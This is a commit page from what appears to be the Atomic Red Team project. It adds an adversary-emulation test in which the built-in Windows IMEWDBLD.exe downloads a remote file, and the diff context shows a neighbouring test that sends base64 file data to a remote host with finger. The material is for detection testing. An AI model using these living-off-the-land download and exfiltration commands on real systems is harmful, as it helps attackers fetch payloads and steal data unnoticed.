security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1105 add test download with imewdbld (#1621)

Browse Source 
* Add test "Download a file with IMEWDBLD.exe"

IMEWDBLD.exe can be used to download files from third party websites. This will throw an error for an invalid dictionary but the file will still be downloaded.
Commands to execute this activity and cleanup commands added.
Cleanup commands call on cmd.exe because PowerShell by default would not remove those files.
Disclosed by https://twitter.com/notwhickey
https://twitter.com/notwhickey/status/136749340683504026

* Update T1105.yaml

fixed typo test 17

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Brian Thacker
2021-09-09 13:02:26 -05:00
committed by GitHub
parent 4114a92cfa
commit 6d46517d6f
1 changed files with 25 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1105/T1105.yaml
+25
View File
@@ -414,3 +414,28 @@ atomic_tests:
name: command_prompt
command: |
finger base64_filedata@#{remote_host}
- name: Download a file with IMEWDBLD.exe
description: |
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
supported_platforms:
- windows
input_arguments:
remote_url:
description: Location of file to be downloaded.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
file_name:
description: Name of the file to be downloaded without extension.
type: string
default: T1105
executor:
command: |
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
cleanup_command: |
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
cmd.exe /c "del $file_to_be_removed"
name: powershell